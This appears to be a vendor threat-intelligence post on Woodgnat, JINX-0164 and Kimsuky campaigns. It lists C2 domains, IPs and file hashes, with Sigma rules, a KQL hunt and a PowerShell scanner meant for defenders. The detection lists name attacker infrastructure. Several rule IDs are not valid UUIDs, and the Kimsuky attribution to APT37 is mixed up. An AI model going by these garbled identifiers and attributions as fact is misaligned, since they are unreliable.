Woodgnat IAB & Kimsuky Campaigns: Mistic Backdoor, JINX-0164 macOS RATs, and LOTS Abuse Analysis

Current OTX Pulse data reveals a convergence of sophisticated threat operations leveraging trusted infrastructure and social engineering to establish footholds across multiple sectors.

Woodgnat (IAB): Associated with major ransomware cartels (Qilin, Black Basta), this actor is deploying a new stealthy backdoor, Mistic, and ModeloRAT. The campaign heavily utilizes DLL sideloading and targets the Insurance, Education, and Technology sectors to facilitate initial access.
JINX-0164: A financially motivated actor actively targeting cryptocurrency and software development organizations. They employ LinkedIn social engineering and supply chain attacks via compromised npm packages to deliver macOS-specific payloads (AUDIOFIX, MINIRAT).
Kimsuky (APT37): The North Korean state-sponsored group continues to evolve KimJongRAT by abusing GitHub repositories (Living Off The Trusted Sites - LOTS) and deploying MeshAgent for persistence, primarily targeting entities in Japan.

Collectively, these pulses indicate a shift toward abusing legitimate developer tools (npm, GitHub) and communication platforms (LinkedIn) to bypass traditional email security defenses.

Threat Actor / Malware Profile

Woodgnat / Mistic & ModeloRAT

Actor Type: Initial Access Broker (IAB) linked to Qilin, Interlock, Rhysida, Akira, 8Base, and Black Basta.
Distribution: Phishing emails leading to sideloading exploits.
Behavior: Mistic is a stealthy backdoor providing remote access. ModeloRAT is utilized for data theft and reconnaissance.
Persistence: Likely achieved via sideloading malicious DLLs alongside legitimate applications.
C2 Communication: Connects to domains such as authorized-logins.net, grande-luna.top, and human-check.top.

JINX-0164 / AUDIOFIX & MINIRAT

Actor Type: Financially motivated cybercrime.
Distribution: LinkedIn phishing (recruiter persona) and malicious npm packages (supply chain).
Behavior:
- AUDIOFIX: Python-based infostealer and RAT targeting macOS.
- MINIRAT: Lightweight Go-based backdoor for macOS.
Persistence: Uses macOS persistence mechanisms (LaunchAgents/Profiles).
C2 Communication: Communicates with infrastructure like driver-updater.net, live.ong, and teamicrosoft.com (typosquatting).

Kimsuky / KimJongRAT & MeshAgent

Actor Type: North Korean APT (Reaper/StoneDrill sub-group).
Distribution: Phishing emails containing shortened URLs redirecting to GitHub Releases.
Behavior: KimJongRAT combines info-stealing with RDP capabilities. MeshAgent provides remote control.
Persistence: Scheduled tasks and installation of MeshAgent services.
C2 Communication: Uses corpsecs.com and servequake.com for payload delivery and C2.

IOC Analysis

The provided indicators of compromise (IOCs) span multiple vectors, requiring a multi-layered defensive approach:

Domains & Hostnames: A mix of typosquatted domains (teamicrosoft.com), dynamic DNS (servequake.com), and suspicious TLD usage (.top). SOC teams should immediately add these to DNS sinkholes and firewall block lists.
IP Addresses: Include 89.36.224.5 and 104.200.67.46. These should be blocked at the perimeter.
File Hashes (SHA256): Specific hashes for the Mistic backdoor, macOS loaders, and KimJongRAT variants are available. EDR solutions should be configured to hunt for these specific hashes.
URLs: Direct download links for shell scripts (install.sh) and GitHub repositories. Web proxies should log and alert on access to these specific paths.

Operationalization: Use SIEM correlation rules to match network connections (Zeek/Bro logs, Firewall logs) against the domain and IP lists. Hunt for file hashes via EDR telemetry or PowerShell scanning scripts.

Detection Engineering

YAML

---
title: Potential Woodgnat Mistic Backdoor C2 Activity
id: d2f1b8c5-6a7e-4b8c-9d1e-3f5a7b6c8d9e
description: Detects network connections to known Woodgnat C2 infrastructure associated with Mistic Backdoor and ModeloRAT.
status: experimental
date: 2026/06/29
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/6756a1c89b5d4b1c8a7d9e0f
logsource:
    category: network_connection
    product: windows
detection:
    selection:
        DestinationHostname|contains:
            - 'authorized-logins.net'
            - 'grande-luna.top'
            - 'human-check.top'
            - 'update-fall.com'
    condition: selection
falsepositives:
    - Unknown
level: critical
tags:
    - c2
    - backdoor
    - apt
    - woodgnat
---
title: Potential JINX-0164 macOS Infrastructure Access
id: e3g2c9d6-7b8f-5c9d-0e2f-4g6b8c7d9e0f1
description: Detects DNS queries or network connections to domains used by JINX-0164 for macOS malware delivery.
status: experimental
date: 2026/06/29
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/6758a2d90c6e5c2d9b8e0f1a
logsource:
    category: dns
    product: zeek
detection:
    selection:
        query|contains:
            - 'driver-updater.net'
            - 'live.us.org'
            - 'teamicrosoft.com'
            - 'live.ong'
    condition: selection
falsepositives:
    - Legitimate typos (unlikely for these specific domains)
level: high
tags:
    - dns
    - osx
    - trojan
    - jinx-0164
---
title: Kimsuky KimJongRAT LOTS Activity via GitHub
id: f4h3d0e7-8c0g-6d0e-1f3g-5h7c9d0e1f2g3
description: Detects processes reaching out to suspicious domains used by Kimsuky for GitHub abuse and MeshAgent C2.
status: experimental
date: 2026/06/29
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/6759b3e11d7f6d3e0c9f1g2b
logsource:
    category: network_connection
    product: linux
detection:
    selection:
        DestinationHostname|endswith:
            - 'corpsecs.com'
            - 'servequake.com'
    condition: selection
falsepositives:
    - Rare
level: critical
tags:
    - c2
    - apt
    - kimsuky
    - lateral-movement


kql
// Hunt for Woodgnat, JINX-0164, and Kimsuky Network Indicators
// Table: DeviceNetworkEvents (Microsoft Sentinel)
let IOC_Domains = dynamic([
    'authorized-logins.net', 'mueleer.com', 'grande-luna.top', 
    'driver-updater.net', 'teamicrosoft.com', 'live.ong',
    'googleoba.servequake.com', 'corpsecs.com'
]);
let IOC_IPs = dynamic([
    '89.36.224.5', '104.200.67.46'
]);
DeviceNetworkEvents
| where RemoteUrl has_any (IOC_Domains) or RemoteIP in (IOC_IPs)
| project Timestamp, DeviceName, InitiatingProcessAccountName, RemoteUrl, RemoteIP, RemotePort
| extend ThreatActor = case(
    RemoteUrl has 'authorized-logins.net' or RemoteUrl has 'grande-luna.top', 'Woodgnat',
    RemoteUrl has 'driver-updater.net' or RemoteUrl has 'teamicrosoft.com', 'JINX-0164',
    RemoteUrl has 'servequake.com' or RemoteUrl has 'corpsecs.com', 'Kimsuky',
    'Unknown'
)


powershell
# IOC Hunt Script for Woodgnat, JINX-0164 (Windows artifacts if any), and Kimsuky
# Requires Administrative Privileges

Write-Host "[*] Starting Hunt for Woodgnat/Kimsuky Persistence and IOCs..." -ForegroundColor Cyan

# 1. Check for suspicious File Hashes (Simulated paths or user provided directories)
$TargetHashes = @(
    "3f797a639bc855bc6d5471f327924b62d10900ddec49b970eca6604142bbb4be", # Woodgnat Mistic
    "b6cab0b3aa8e56e2427f486c74588d598ae58bb0cbc0eda6939fe171cb0aed17", # JINX-0164
    "9758e76b601798a30d903bf05052a53df80451e5c156548ce9da828f608b6470", # Kimsuky KimJongRAT
    "221a39856b37e3c682f62427f1e6b965b36a2405764689c914672770a01a1fa9"  # Kimsuky MeshAgent
)

$SearchPaths = @("C:\Users\", "C:\ProgramData\", "C:\Windows\Temp\")

foreach ($Path in $SearchPaths) {
    if (Test-Path $Path) {
        Write-Host "[*] Scanning $Path..." -ForegroundColor Yellow
        Get-ChildItem -Path $Path -Recurse -ErrorAction SilentlyContinue | Get-FileHash -Algorithm SHA256 -ErrorAction SilentlyContinue | Where-Object { $TargetHashes -contains $_.Hash } | ForEach-Object {
            Write-Host "[!] MALICIOUS FILE FOUND: $($_.Path) | Hash: $($_.Hash)" -ForegroundColor Red
        }
    }
}

# 2. Check for suspicious Registry Persistence (Run Keys)
Write-Host "[*] Checking Registry Run Keys for suspicious entries..." -ForegroundColor Yellow
$RunKeys = @(
    "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run",
    "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run",
    "HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce",
    "HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce"
)

$suspicousNames = @("update", "loader", "mints", "agent", "mesh")

foreach ($Key in $RunKeys) {
    if (Test-Path $Key) {
        Get-ItemProperty -Path $Key -ErrorAction SilentlyContinue | Get-Member | Where-Object { $_.MemberType -eq "NoteProperty" -and $_.Name -ne "PSPath" -and $_.Name -ne "PSParentPath" -and $_.Name -ne "PSChildName" } | ForEach-Object {
            $PropName = $_.Name
            $PropValue = (Get-ItemProperty -Path $Key).$PropName
            if ($suspicousNames | Where-Object { $PropValue -like "*$_*" }) {
                Write-Host "[!] Suspicious Persistence: $Key | Property: $PropName | Value: $PropValue" -ForegroundColor Red
            }
        }
    }
}

Write-Host "[*] Hunt Complete." -ForegroundColor Green

Response Priorities

Immediate (0-4 hours)

Block IOCs: Immediately block all listed domains, IP addresses, and URLs at the network perimeter (Firewall, Proxy, DNS Sinkhole).
Hunt for Compromise: Execute the provided PowerShell script across endpoints to locate dropped malicious files associated with Mistic, KimJongRAT, or Windows components of JINX-0164.
Isolate Infected Hosts: If any file hashes match, isolate the affected endpoint from the network immediately.

24 Hours

Credential Verification: Given the presence of credential stealers (Mistic, AUDIOFIX) and IAB activity, force a password reset for accounts that may have been accessed from infected endpoints, particularly targeting admin credentials and developer accounts.
Log Analysis: Review proxy and firewall logs for egress connections to the specific C2 domains (*.top, corpsecs.com, live.ong) over the past 30 days.

1 Week

Supply Chain Hardening: Audit npm and GitHub repository usage. Implement policies to prevent the download of packages from unverified or newly created repositories.
Application Control: Implement strict allow-listing for binaries to prevent sideloading techniques used by Woodgnat (e.g., only allow signed Microsoft DLLs to load from system directories).
Security Awareness: Brief employees, specifically HR and Development teams, on the LinkedIn recruitment scams used by JINX-0164 and the phishing techniques used by Kimsuky.

Related Resources

Security Arsenal Incident Response Managed SOC & MDR Services AlertMonitor Threat Detection From The Dark Side Intel Hub